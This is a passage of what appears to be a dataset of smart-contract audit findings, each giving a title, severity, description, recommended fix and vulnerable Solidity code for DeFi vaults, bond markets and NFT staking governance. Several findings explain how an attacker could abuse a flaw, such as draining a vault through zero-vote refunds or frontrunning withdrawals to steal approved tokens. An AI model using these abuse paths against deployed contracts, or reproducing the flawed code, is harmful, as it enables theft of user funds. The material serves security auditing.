Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n\\n`meta.tuneInterval` has impact on `meta.tuneIntervalCapacity`. That means that when you change tuning interval you also change the capacity that is operated during tuning. There is also one more param that depends on this, but is not counted here.\\n```\\n if (\\n (market.capacity < meta.tuneBelowCapacity && timeNeutralCapacity < initialCapacity) ||\\n (time_ >= meta.lastTune + meta.tuneInterval && timeNeutralCapacity > initialCapacity)\\n ) {\\n // Calculate the correct payout to complete on time assuming each bond\\n // will be max size in the desired deposit interval for the remaining time\\n //\\n // i.e. market has 10 days remaining. deposit interval is 1 day. capacity\\n // is 10,000 TOKEN. 
max payout would be 1,000 TOKEN (10,000 * 1 / 10).\\n markets[id_].maxPayout = capacity.mulDiv(uint256(meta.depositInterval), timeRemaining);\\n\\n\\n // Calculate ideal target debt to satisty capacity in the remaining time\\n // The target debt is based on whether the market is under or oversold at this point in time\\n // This target debt will ensure price is reactive while ensuring the magnitude of being over/undersold\\n // doesn't cause larger fluctuations towards the end of the market.\\n //\\n // Calculate target debt from the timeNeutralCapacity and the ratio of debt decay interval and the length of the market\\n uint256 targetDebt = timeNeutralCapacity.mulDiv(\\n uint256(meta.debtDecayInterval),\\n uint256(meta.length)\\n );\\n\\n\\n // Derive a new control variable from the target debt\\n uint256 controlVariable = terms[id_].controlVariable;\\n uint256 newControlVariable = price_.mulDivUp(market.scale, targetDebt);\\n\\n\\n emit Tuned(id_, controlVariable, newControlVariable);\\n\\n\\n if (newControlVariable < controlVariable) {\\n // If decrease, control variable change will be carried out over the tune interval\\n // this is because price will be lowered\\n uint256 change = controlVariable - newControlVariable;\\n adjustments[id_] = Adjustment(change, time_, meta.tuneAdjustmentDelay, true);\\n } else {\\n // Tune up immediately\\n terms[id_].controlVariable = newControlVariable;\\n // Set current adjustment to inactive (e.g. if we are re-tuning early)\\n adjustments[id_].active = false;\\n }\\n\\n\\n metadata[id_].lastTune = time_;\\n metadata[id_].tuneBelowCapacity = market.capacity > meta.tuneIntervalCapacity\\n ? 
market.capacity - meta.tuneIntervalCapacity\\n : 0;\\n metadata[id_].lastTuneDebt = targetDebt;\\n }\\n```\\n\\nIf you don't update `meta.tuneBelowCapacity` when changing intervals you have a risk, that price will not be tuned when tuneIntervalCapacity was decreased or it will be still tuned when tuneIntervalCapacity was increased.\\nAs a result tuning will not be completed when needed.",Update meta.tuneBelowCapacity in BondBaseSDA.setIntervals function.,Tuning logic will not be completed when needed.,"```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n" +DnGmxJuniorVaultManager#_rebalanceBorrow logic is flawed and could result in vault 
liquidation,high,"DnGmxJuniorVaultManager#_rebalanceBorrow fails to rebalance correctly if only one of the two assets needs a rebalance. In the case where one assets increases rapidly in price while the other stays constant, the vault may be liquidated.\\n```\\n // If both eth and btc swap amounts are not beyond the threshold then no flashloan needs to be executed | case 1\\n if (btcAssetAmount == 0 && ethAssetAmount == 0) return;\\n\\n if (repayDebtBtc && repayDebtEth) {\\n // case where both the token assets are USDC\\n // only one entry required which is combined asset amount for both tokens\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n assets[0] = address(state.usdc);\\n amounts[0] = (btcAssetAmount + ethAssetAmount);\\n } else if (btcAssetAmount == 0 || ethAssetAmount == 0) {\\n // Exactly one would be true since case-1 excluded (both false) | case-2\\n // One token amount = 0 and other token amount > 0\\n // only one entry required for the non-zero amount token\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n if (btcAssetAmount == 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n\\nThe logic above is used to determine what assets to borrow using the flashloan. If the rebalance amount is under a threshold then the assetAmount is set equal to zero. The first check `if (btcAssetAmount == 0 && ethAssetAmount == 0) return;` is a short circuit that returns if neither asset is above the threshold. The third check `else if (btcAssetAmount == 0 || ethAssetAmount == 0)` is the point of interest. Since we short circuit if both are zero then to meet this condition exactly one asset needs to be rebalanced. The logic that follows is where the error is. 
In the comments it indicates that it needs to enter with the non-zero amount token but the actual logic reflects the opposite. If `btcAssetAmount == 0` it actually tries to enter with wBTC which would be the zero amount asset.\\nThe result of this can be catastrophic for the vault. If one token increases in value rapidly while the other is constant the vault will only ever try to rebalance the one token but because of this logical error it will never actually complete the rebalance. If the token increase in value enough the vault would actually end up becoming liquidated.",Small change to reverse the logic and make it correct:\\n```\\n- if (btcAssetAmount == 0) {\\n+ if (btcAssetAmount != 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n,"Vault is unable to rebalance correctly if only one asset needs to be rebalanced, which can lead to the vault being liquidated",```\\n // If both eth and btc swap amounts are not beyond the threshold then no flashloan needs to be executed | case 1\\n if (btcAssetAmount == 0 && ethAssetAmount == 0) return;\\n\\n if (repayDebtBtc && repayDebtEth) {\\n // case where both the token assets are USDC\\n // only one entry required which is combined asset amount for both tokens\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n assets[0] = address(state.usdc);\\n amounts[0] = (btcAssetAmount + ethAssetAmount);\\n } else if (btcAssetAmount == 0 || ethAssetAmount == 0) {\\n // Exactly one would be true since case-1 excluded (both false) | case-2\\n // One token amount = 0 and other token amount > 0\\n // only one entry required for the non-zero amount token\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n if (btcAssetAmount == 0) {\\n assets[0] = (repayDebtBtc ? 
address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n +DnGmxJuniorVaultManager#_totalAssets current implementation doesn't properly maximize or minimize,medium,"The maximize input to DnGmxJuniorVaultManager#_totalAssets indicates whether to either maximize or minimize the NAV. Internal logic of the function doesn't accurately reflect that because under some circumstances, maximize = true actually returns a lower value than maximize = false.\\n```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n\\nTo maximize the estimate for the NAV of the vault underlying debt should minimized and value of held assets should be maximized. Under the current settings there is a mix of both of those and the function doesn't consistently minimize or maximize. Consider when NAV is ""maxmized"". Under this scenario the value of when estimated the GlpPrice is minimized. This minimizes the value of both the borrowedGlp (debt) and of the unhedgedGlp (assets). 
The result is that the NAV is not maximized because the value of the assets is also minimized. In this scenario the GlpPrice should be maximized when calculating the assets and minimized when calculating the debt. The reverse should be true when minimizing the NAV. Slippage requirements are also applied incorrectly when adjusting borrowValueGlp. The current implementation implies that if the debt were to be paid back that the vault would repay their debt for less than expected. When paying back debt the slippage should imply paying more than expected rather than less, therefore the slippage should be added rather than subtracted.","To properly maximize, it should assume the best possible rate for exchanging its assets. Likewise to minimize, it should assume its debt is as large as possible and thus it encounters maximum possible slippage when repaying its debt. I recommend the following changes:\\n```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n- _getGlpPrice(state, !maximize)\\n+ _getGlpPrice(state, maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n- if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n+ if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS + state.slippageThresholdGmxBps, 
MAX_BPS);\\n```\\n",DnGmxJuniorVaultManager#_totalAssets doesn't accurately reflect NAV. Since this is used when determining critical parameters it may lead to inaccuracies.,"```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n" +`Staking.unstake()` doesn't decrease the original voting power that was used in `Staking.stake()`.,high,"`Staking.unstake()` doesn't decrease the original voting power that was used in `Staking.stake()`.\\nWhen users stake/unstake the underlying NFTs, it calculates the token voting power using getTokenVotingPower() and increases/decreases their voting power accordingly.\\n```\\n function getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? 
PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n\\nBut `getTokenVotingPower()` uses some parameters like `monsterMultiplier` and `baseVotes` and the output would be changed for the same `tokenId` after the admin changed these settings.\\nCurrently, `_stake()` and `_unstake()` calculates the token voting power independently and the below scenario would be possible.\\nAt the first time, `baseVotes = 20, monsterMultiplier = 50`.\\nA user staked a `FrankenMonsters` and his voting power = 10 here.\\nAfter that, the admin changed `monsterMultiplier = 60`.\\nWhen a user tries to unstake the NFT, the token voting power will be `20 * 60 / 100 = 12` here.\\nSo it will revert with uint underflow here.\\nAfter all, he can't unstake the NFT.",I think we should add a mapping like `tokenVotingPower` to save an original token voting power when users stake the token and decrease the same amount when they unstake.,`votesFromOwnedTokens` might be updated wrongly or users can't unstake for the worst case because it doesn't decrease the same token voting power while unstaking.,"```\\n function getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n" +Staking#_unstake removes votes from wrong person if msg.sender != owner,high,"Staking#_unstake allows any msg.sender to unstake tokens for any owner that has approved them. 
The issue is that even when msg.sender != owner the votes are removed from msg.sender instead of owner. The result is that the owner keeps their votes and msg.sender loses theirs. This could be abused to hijack or damage voting.\\n```\\naddress owner = ownerOf(_tokenId);\\nif (msg.sender != owner && !isApprovedForAll[owner][msg.sender] && msg.sender != getApproved[_tokenId]) revert NotAuthorized();\\n```\\n\\nStaking#_unstake allows any msg.sender to unstake tokens for any owner that has approved them.\\n```\\nuint lostVotingPower;\\nfor (uint i = 0; i < numTokens; i++) {\\n lostVotingPower += _unstakeToken(_tokenIds[i], _to);\\n}\\n\\nvotesFromOwnedTokens[msg.sender] -= lostVotingPower;\\n// Since the delegate currently has the voting power, it must be removed from their balance\\n// If the user doesn't delegate, delegates(msg.sender) will return self\\ntokenVotingPower[getDelegate(msg.sender)] -= lostVotingPower;\\ntotalTokenVotingPower -= lostVotingPower;\\n```\\n\\nAfter looping through _unstakeToken all accumulated votes are removed from msg.sender. The problem with this is that msg.sender is allowed to unstake tokens for users other than themselves and in these cases they will lose votes rather than the user who owns the token.\\nExample: User A and User B both stake tokens and have 10 votes each. User A approves User B to unstake their tokens. User B calls unstake for User A. User B is msg.sender and User A is owner. The votes should be removed from owner but instead are removed from msg.sender. The result is that after unstaking User B has a vote balance of 0 while still having their locked token and User B has a vote balance of 10 and their token back. Now User B is unable to unstake their token because their votes will underflow on unstake, permanently trapping their NFT.",Remove the ability for users to unstake for other users,Votes are removed incorrectly if msg.sender != owner. 
By extension this would forever trap msg.sender tokens in the contract.,```\\naddress owner = ownerOf(_tokenId);\\nif (msg.sender != owner && !isApprovedForAll[owner][msg.sender] && msg.sender != getApproved[_tokenId]) revert NotAuthorized();\\n```\\n +castVote can be called by anyone even those without votes,medium,"Governance#castVote can be called by anyone, even users that don't have any votes. Since the voting refund is per address, an adversary could use a large number of addresses to vote with zero votes to drain the vault.\\n```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you 
have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n\\nNowhere in the flow of voting does the function revert if the user calling it doesn't actually have any votes. staking#getVotes won't revert under any circumstances. Governance#_castVote only reverts if 1) the proposal isn't active 2) support > 2 or 3) if the user has already voted. The result is that any user can vote even if they don't have any votes, allowing users to maliciously burn vault funds by voting and claiming the vote refund.",Governance#_castVote should revert if msg.sender doesn't have any votes:\\n```\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n+ if (votes == 0) revert NoVotes();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n```\\n,Vault can be drained maliciously by users with no votes,"```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = 
(staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n" +Delegate can keep delegatee trapped indefinitely,medium,"Users are allowed to delegate their votes to other users. Since staking does not implement checkpoints, users are not allowed to delegate or unstake during an active proposal if their delegate has already voted. A malicious delegate can abuse this by creating proposals so that there is always an active proposal and their delegatees are always locked to them.\\n```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n\\nThe above modifier is applied when unstaking or delegating. This reverts if the delegate of msg.sender either has voted or currently has an open proposal. The result is that under those conditions, the delegatee cannot unstake or delegate. 
A malicious delegate can abuse these conditions to keep their delegatees forever delegated to them. They would keep opening proposals so that delegatees could never unstake or delegate. A single users can only have a one proposal opened at the same time so they would use a secondary account to alternate and always keep an active proposal.","There should be a function to emergency eject the token from staking. To prevent abuse a token that has been emergency ejected should be blacklisted from staking again for a certain cooldown period, such as the length of current voting period.",Delegatees can never unstake or delegate to anyone else,"```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n" +"If a user approves junior vault tokens to WithdrawPeriphery, anyone can withdraw/redeem his/her token",high,"If users want to withdraw/redeem tokens by WithdrawPeriphery, they should approve token approval to WithdrawPeriphery, then call `withdrawToken()` or `redeemToken()`. 
But if users approve `dnGmxJuniorVault` to WithdrawPeriphery, anyone can withdraw/redeem his/her token.\\nUsers should approve `dnGmxJuniorVault` before calling `withdrawToken()` or redeemToken():\\n```\\n function withdrawToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sGlpAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), from);\\n// rest of code\\n\\n function redeemToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sharesAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), from);\\n// rest of code\\n```\\n\\nFor better user experience, we always use `approve(WithdrawPeriphery, type(uint256).max)`. It means that if Alice approves the max amount, anyone can withdraw/redeem her tokens anytime. Another scenario is that if Alice approves 30 amounts, she wants to call `withdrawToken` to withdraw 30 tokens. But in this case Alice should send two transactions separately, then an attacker can frontrun `withdrawToken` transaction and withdraw Alice's token.","Replace `from` parameter by `msg.sender`.\\n```\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), msg.sender);\\n\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), msg.sender);\\n```\\n","Attackers can frontrun withdraw/redeem transactions and steal tokens. 
And some UI always approves max amount, which means that anyone can withdraw users tokens.","```\\n function withdrawToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sGlpAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), from);\\n// rest of code\\n\\n function redeemToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sharesAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), from);\\n// rest of code\\n```\\n" +DnGmxJuniorVaultManager#harvestFees can push junior vault borrowedUSDC above borrow cap and DOS vault,medium,"DnGmxJuniorVaultManager#harvestFees grants fees to the senior vault by converting the WETH to USDC and staking it directly. The result is that the senior vault gains value indirectly by increasing the debt of the junior vault. If the junior vault is already at it's borrow cap this will push it's total borrow over the borrow cap causing DnGmxSeniorVault#availableBorrow to underflow and revert. 
This is called each time a user deposits or withdraws from the junior vault meaning that the junior vault can no longer deposit or withdraw.\\n```\\n if (_seniorVaultWethRewards > state.wethConversionThreshold) {\\n // converts senior tranche share of weth into usdc and deposit into AAVE\\n // Deposit aave vault share to AAVE in usdc\\n uint256 minUsdcAmount = _getTokenPriceInUsdc(state, state.weth).mulDivDown(\\n _seniorVaultWethRewards * (MAX_BPS - state.slippageThresholdSwapEthBps),\\n MAX_BPS * PRICE_PRECISION\\n );\\n // swaps weth into usdc\\n (uint256 aaveUsdcAmount, ) = state._swapToken(\\n address(state.weth),\\n _seniorVaultWethRewards,\\n minUsdcAmount\\n );\\n\\n // supplies usdc into AAVE\\n state._executeSupply(address(state.usdc), aaveUsdcAmount);\\n\\n // resets senior tranche rewards\\n state.seniorVaultWethRewards = 0;\\n```\\n\\nThe above lines converts the WETH owed to the senior vault to USDC and deposits it into Aave. Increasing the aUSDC balance of the junior vault.\\n```\\nfunction getUsdcBorrowed() public view returns (uint256 usdcAmount) {\\n return\\n uint256(\\n state.aUsdc.balanceOf(address(this)).toInt256() -\\n state.dnUsdcDeposited -\\n state.unhedgedGlpInUsdc.toInt256()\\n );\\n}\\n```\\n\\nThe amount of USDC borrowed is calculated based on the amount of aUSDC that the junior vault has. By depositing the fees directly above, the junior vault has effectively ""borrowed"" more USDC. This can be problematic if the junior vault is already at it's borrow cap.\\n```\\nfunction availableBorrow(address borrower) public view returns (uint256 availableAUsdc) {\\n uint256 availableBasisCap = borrowCaps[borrower] - IBorrower(borrower).getUsdcBorrowed();\\n uint256 availableBasisBalance = aUsdc.balanceOf(address(this));\\n\\n availableAUsdc = availableBasisCap < availableBasisBalance ? 
availableBasisCap : availableBasisBalance;\\n}\\n```\\n\\nIf the vault is already at it's borrow cap then the line calculating `availableBasisCap` will underflow and revert.",Check if borrowed exceeds borrow cap and return zero to avoid underflow:\\n```\\nfunction availableBorrow(address borrower) public view returns (uint256 availableAUsdc) {\\n\\n+ uint256 borrowCap = borrowCaps[borrower];\\n+ uint256 borrowed = IBorrower(borrower).getUsdcBorrowed();\\n\\n+ if (borrowed > borrowCap) return 0;\\n\\n+ uint256 availableBasisCap = borrowCap - borrowed;\\n\\n- uint256 availableBasisCap = borrowCaps[borrower] - IBorrower(borrower).getUsdcBorrowed();\\n uint256 availableBasisBalance = aUsdc.balanceOf(address(this));\\n\\n availableAUsdc = availableBasisCap < availableBasisBalance ? availableBasisCap : availableBasisBalance;\\n}\\n```\\n,availableBorrow will revert causing deposits/withdraws to revert,"```\\n if (_seniorVaultWethRewards > state.wethConversionThreshold) {\\n // converts senior tranche share of weth into usdc and deposit into AAVE\\n // Deposit aave vault share to AAVE in usdc\\n uint256 minUsdcAmount = _getTokenPriceInUsdc(state, state.weth).mulDivDown(\\n _seniorVaultWethRewards * (MAX_BPS - state.slippageThresholdSwapEthBps),\\n MAX_BPS * PRICE_PRECISION\\n );\\n // swaps weth into usdc\\n (uint256 aaveUsdcAmount, ) = state._swapToken(\\n address(state.weth),\\n _seniorVaultWethRewards,\\n minUsdcAmount\\n );\\n\\n // supplies usdc into AAVE\\n state._executeSupply(address(state.usdc), aaveUsdcAmount);\\n\\n // resets senior tranche rewards\\n state.seniorVaultWethRewards = 0;\\n```\\n" +WithdrawPeriphery#_convertToToken slippage control is broken for any token other than USDC,medium,"WithdrawPeriphery allows the user to redeem junior share vaults to any token available on GMX, applying a fixed slippage threshold to all redeems. The slippage calculation always returns the number of tokens to 6 decimals. 
This works fine for USDC but for other tokens like WETH or WBTC that are 18 decimals the slippage protection is completely ineffective and can lead to loss of funds for users that are withdrawing.\\n```\\nfunction _convertToToken(address token, address receiver) internal returns (uint256 amountOut) {\\n // this value should be whatever glp is received by calling withdraw/redeem to junior vault\\n uint256 outputGlp = fsGlp.balanceOf(address(this));\\n\\n // using min price of glp because giving in glp\\n uint256 glpPrice = _getGlpPrice(false);\\n\\n // using max price of token because taking token out of gmx\\n uint256 tokenPrice = gmxVault.getMaxPrice(token);\\n\\n // apply slippage threshold on top of estimated output amount\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n\\n // will revert if atleast minTokenOut is not received\\n amountOut = rewardRouter.unstakeAndRedeemGlp(address(token), outputGlp, minTokenOut, receiver);\\n}\\n```\\n\\nWithdrawPeriphery allows the user to redeem junior share vaults to any token available on GMX. To prevent users from losing large amounts of value to MEV the contract applies a fixed percentage slippage. minToken out is returned to 6 decimals regardless of the token being requested. 
This works for tokens with 6 decimals like USDC, but is completely ineffective for the majority of tokens that aren't.","Adjust minTokenOut to match the decimals of the token:\\n```\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n+ minTokenOut = minTokenOut * 10 ** (token.decimals() - 6);\\n```\\n",Users withdrawing tokens other than USDC can suffer huge loss of funds due to virtually no slippage protection,"```\\nfunction _convertToToken(address token, address receiver) internal returns (uint256 amountOut) {\\n // this value should be whatever glp is received by calling withdraw/redeem to junior vault\\n uint256 outputGlp = fsGlp.balanceOf(address(this));\\n\\n // using min price of glp because giving in glp\\n uint256 glpPrice = _getGlpPrice(false);\\n\\n // using max price of token because taking token out of gmx\\n uint256 tokenPrice = gmxVault.getMaxPrice(token);\\n\\n // apply slippage threshold on top of estimated output amount\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n\\n // will revert if atleast minTokenOut is not received\\n amountOut = rewardRouter.unstakeAndRedeemGlp(address(token), outputGlp, minTokenOut, receiver);\\n}\\n```\\n" +WithdrawPeriphery uses incorrect value for MAX_BPS which will allow much higher slippage than intended,medium,"WithdrawPeriphery accidentally uses an incorrect value for MAX_BPS which will allow for much higher slippage than intended.\\n```\\nuint256 internal constant MAX_BPS = 1000;\\n```\\n\\nBPS is typically 10,000 and using 1000 is inconsistent with the rest of the ecosystem contracts and 